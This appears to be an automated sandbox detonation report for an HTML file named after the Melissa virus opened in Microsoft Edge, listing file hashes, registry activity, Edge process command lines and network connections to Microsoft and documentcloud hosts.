| SHA256 | 8f738a4f4285598ce59cb0eaff89a924be8d9ad38dddca70d9f1b1b260612a32 |
| SHA512 | 0d0980880a2cc429c34ca859871a44046dfe2f812d1fb21fa00bb78205795c259006d04e1395614af72e669d9bc3421632b35a67d840d2be011c6f9e1d0561cf |
C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\manifest.json
| MD5 | 0d77c27baa669b0714c49b73e68447ea |
| SHA1 | 65103c9707e083c5503ad9979560ba1bb7634ae4 |
| SHA256 | c853d6a286d9d31a382c6d3fb109d5336d275651950f22b8243289eb6125b516 |
| SHA512 | 1f011c405ec558229a1f5e2923b38b7054144c66d4c69d658c9c2c371f6cc365317485c274cafcab80bcb88f989b0be4c43c763933de3f86362a79ec1e962ff3 |
C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\Tokenized-Card\tokenized-card.bundle.js.LICENSE.txt
| MD5 | 8595bdd96ab7d24cc60eb749ce1b8b82 |
| SHA1 | 3b612cc3d05e372c5ac91124f3756bbf099b378d |
| SHA256 | 363f376ab7893c808866a830fafbcd96ae6be93ec7a85fabf52246273cf56831 |
| SHA512 | 555c0c384b6fcfc2311b47c0b07f8e34243de528cf1891e74546b6f4cda338d75c2e2392827372dc39e668ed4c2fd1a02112d8136d2364f9cab9ee4fa1bd87f5 |
C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\Notification\notification_fast.bundle.js.LICENSE.txt
| MD5 | 7bf61e84e614585030a26b0b148f4d79 |
| SHA1 | c4ffbc5c6aa599e578d3f5524a59a99228eea400 |
| SHA256 | 38ed54eb53300fdb6e997c39c9fc83a224a1fd9fa06a0b6d200aa12ea278c179 |
| SHA512 | ca5f2d3a4f200371927c265b9fb91b8bcd0fbad711559f796f77b695b9038638f763a040024ed185e67be3a7b58fab22a6f8114e73fdbd1cccdda6ef94ff88f3 |
C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-tokenized-card\fr-CA\strings.json
| MD5 | cd247582beb274ca64f720aa588ffbc0 |
| SHA1 | 4aaeef0905e67b490d4a9508ed5d4a406263ed9c |
| SHA256 | c67b555372582b07df86a6ce3329a854e349ba9525d7be0672517bab0ac14db5 |
| SHA512 | bf8fa4bd7c84038fae9eddb483ae4a31d847d5d47b408b3ea84d46d564f15dfc2bae6256eac4a852dd1c4ad8e58bc542e3df30396be05f30ed07e489ebe52895 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-checkout-eligible-sites.json
| MD5 | 16d41ebc643fd34addf3704a3be1acdd |
| SHA1 | b7fadc8afa56fbf4026b8c176112632c63be58a0 |
| SHA256 | b962497993e2cd24039474bc84be430f8f6e6ab0f52010e90351dc3ff259336c |
| SHA512 | 8d58aa30613a2376ccc729278d166a9b3ec87eca95544b9dec1ee9300e7dd987326ea42d05dca3f1cc08186685f2fdaf53c24fd2b756c1ed9f2b46436689dc74 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-tokenization-config.json
| MD5 | ae3bd0f89f8a8cdeb1ea6eea1636cbdd |
| SHA1 | 1801bc211e260ba8f8099727ea820ecf636c684a |
| SHA256 | 0088d5ebd8360ad66bd7bcc80b9754939775d4118cb7605fc1f514c707f0e20d |
| SHA512 | 69aff97091813d9d400bb332426c36e6b133a4b571b521e8fb6ad1a2b8124a3c5da8f3a9c52b8840152cf7adbd2ac653102aa2210632aa64b129cf7704d5b4fa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-notification-config.json
| MD5 | 4cdefd9eb040c2755db20aa8ea5ee8f7 |
| SHA1 | f649fcd1c12c26fb90906c4c2ec0a9127af275f4 |
| SHA256 | bb26ce6fe9416918e9f92fcc4a6fe8a641eceea54985356637991cf6d768f9fd |
| SHA512 | 7e23b91eab88c472eec664f7254c5513fc5de78e2e0151b0bcc86c3cd0bf2cb5d8bb0345d27afdd9f8fcb10be96feaa753f09e301fa92b8d76f4300600577209 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-stable.json
| MD5 | 05f65948a88bd669597fc3b4e225ecae |
| SHA1 | 5397b14065e49ff908c66c51fc09f53fff7caed7 |
| SHA256 | 0e329e63d8457bef61d0986a521f81d747a09dadf3b1136f2011942ba14d9fc0 |
| SHA512 | ed7b767a741d18c0dd35e0311db752120e0f090d39ef976d541cbc5ae78fa32655cb3f9c27cddef6ca8091ca8bf31513254a748bc8b95353897f6198a667cf58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 526136acc59eaa6d64042a27ac085777 |
| SHA1 | c6b8a3ba41af37cccfc8c53229472c3730a55a7b |
| SHA256 | 48fdb8c31a08c418f8bc703fdc34ab2bb18e542841d0a31d0b3eccaef68d604a |
| SHA512 | 31853eb33507898e8d57141a4661bd7010af1d85f442ba3edf7f283c0a72416c341951cb9d79d8fd7d981ee07b3d4212d80f09fc1694c52ec0ed972e06d44261 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 8c49aefc619b283e15fef6440a621643 |
| SHA1 | c015a871d23118a8150dda6db6ea2e85390496a2 |
| SHA256 | bcf032e02094a3e05546a4e58af9025d28cc97ec23d75d53682496a639dbb931 |
| SHA512 | f372b259faa0a9bfc48071f1a0a99223a5e8cb08be93e3a64783af995a98120e9b835e11dcb9f50e6866b41ed7b5f22c8d3f3aeead3b1b132724a95d66ecf312 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c4c8a582ab2d0410d1dec0cc1dcc3b9e |
| SHA1 | f3b4e8901e9d22c09b858ddea62e64bf51b843d8 |
| SHA256 | df5d28327e0a0aea3dac8103c3d72a0adf1be2fd446522f5a0d0f25055313fa8 |
| SHA512 | 55634fa7edcd38f3e711db4de8e9a62f92f4d07c68668109678b4e98e1a9f9bee7aa544b92dcd9725ce9351c120006a41581f40e1995d2a20eb00751542f8afb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | cb95cf37e6d0412c694fd7f7770e4be8 |
| SHA1 | 137dc525ca9f1df5d3eb06e68b55e3c2c7752c09 |
| SHA256 | 3d87fbb0c8a097bb7118e59597635828970f023272055f39ff4a376ca5e7c1d6 |
| SHA512 | a72696a591b5d16cc14013183755497fa772ba9691045d35589e7ae55ebd21dce42afb3b387491b5c2730b3c5646303a7bc26a1302022fc789faf83fe866282b |
Analysis: behavioral2
Detonation Overview
Submitted
2025-04-21 02:19
Reported
2025-04-21 02:21
Platform
win11-20250410-en
Max time kernel
139s
Max time network
131s
Command Line
Signatures
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_229346093\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_229346093\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_229346093\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_1442292907\deny_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_1442292907\deny_full_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_1442292907\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_1862864033\typosquatting_list.pb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_229346093\sets.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_1442292907\deny_etld1_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_1442292907\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_1862864033\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_1862864033\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_229346093\LICENSE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133896755627127792" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3582532709-2637047242-3508314386-1000\{DBE9FEB8-6EB5-44A3-A935-675744703E82} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\6548553-Melissa-Virus-MR73006.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x350,0x7ff91ca9f208,0x7ff91ca9f214,0x7ff91ca9f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1784,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=2284 /prefetch:11
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2264,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=2348 /prefetch:13
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2244,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=2240 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3456,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=3516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4696,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=4892 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4740,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=4920 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5360,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=5592 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5664,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=5688 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5664,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=5688 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5692,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=5764 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
cookie_exporter.exe --cookie-json=1136
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5752,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=6104 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5904,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=6100 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5836,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=6120 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4980,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=5068 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5804,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=4880 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6188,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=6208 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4920,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=6088 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5948,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:10
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6012,i,7854719647966725840,13697441570569829085,262144 --variations-seed-version --mojo-platform-channel-handle=5308 /prefetch:14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | s3.documentcloud.org | udp |
| US | 8.8.8.8:53 | s3.documentcloud.org | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:80 | edge.microsoft.com | tcp |
| US | 104.22.58.213:443 | s3.documentcloud.org | udp |
| US | 104.22.58.213:443 | s3.documentcloud.org | tcp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 104.22.58.213:443 | s3.documentcloud.org | tcp |
| GB | 2.16.153.209:443 | copilot.microsoft.com | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 2.16.153.209:443 | copilot.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| NL | 108.177.119.94:443 | update.googleapis.com | tcp |
| GB | 2.16.153.206:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 2.16.153.206:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 13.107.246.64:443 | edge-mobile-static.azureedge.net | tcp |
| GB | 23.73.139.43:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| ES | 23.62.180.208:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 73db6c5bfcbf52f815a08f275b5efca5 |
| SHA1 | ab8139c5e002442ab3d8155d6fb3bffe0022bcea |
| SHA256 | fe74f7e3eff49188780f1d66a85d50ac08d649fedcbd489f2211ba5c828eb841 |
| SHA512 | 8fc7b4a70732957f419755525c918675aa6cdd004f3a5327d0bd642eac6d7f0752325fce52f2c65460be6d78a629c2fc39511a3e78b94ce940dd401b199e7d4f |
\??\pipe\crashpad_2600_DTWAIWWUVGJLOSAB
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 978d790ea9bbd3b3113b1d32773304fa |
| SHA1 | 61c9b3724e684c2a0507d7c9ae294e668e6c6e58 |
| SHA256 | 36c686a276e904607d2a18c2a2fc54467fb8dc1698607f5d5a6cefb75aa513c8 |
| SHA512 | d50740255d20d2a5e6abdc78f4fe9ef6e832f2ffe9ecc200916a73db1e0dd37d67d88996b315e128bf5b77bb110e4e8c29905aa5d90b83019be2cc8127d0dfc5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
| MD5 | 2b66d93c82a06797cdfd9df96a09e74a |
| SHA1 | 5f7eb526ee8a0c519b5d86c845fea8afd15b0c28 |
| SHA256 | d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954 |
| SHA512 | 95e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
| MD5 | 21a6a6b93929b9f9fad70833b0190d20 |
| SHA1 | 3c25dfd1068fb0086833934f05da95d35def5af9 |
| SHA256 | ce9692b712e58f529b7417b37529e9db967aff8433758f6ba877881b1375a26e |
| SHA512 | 2dfd3e2a3c555130f3ea1eeb368904b50dac8f3b889c0af64261e0cd5a32ff847f1eb40efbfa707797478f95741d74111aef6d8ff8ac5b27431a17feb19bca4f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b97e70583b04fd9b2f54d537c8c2cd66 |
| SHA1 | 99829a5418053d3962daed98a1fd3b1028b4274d |
| SHA256 | a527cd773a0c7f73ed1a001e4c439454784cd9fe56fadf8c57ab5e5c7afd5ba3 |
| SHA512 | 0f50f5074323a1d7170d37d32ca6c0761cde5c4c4b2afc1380c0f7310e3fc1a0fb88b8a0e097576152b459bc1675d5fff7d2ef37b3c686a0cfcf81989990d5da |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c5fabb4e319b52c40eaf8ef78fc7332b |
| SHA1 | 0facb2dd52e4937db4dedd219d3ac3b512eb4211 |
| SHA256 | e06c1e48e7baad42205aabc246202549290320442dc30f0f9ce727cf0a58a8df |
| SHA512 | 5c9225d7a68f16e536e3afccfd216857fa3256d1fb57eb80df39426503af3cbad7b57c7645f7a25931ecb37251eb430931135da8f238a03ef910bdbb4d3aa332 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | f7fc62178982c16927e4f374f3556792 |
| SHA1 | d47e23cfedb08f34d5d2c64733a7bdd762937f3a |
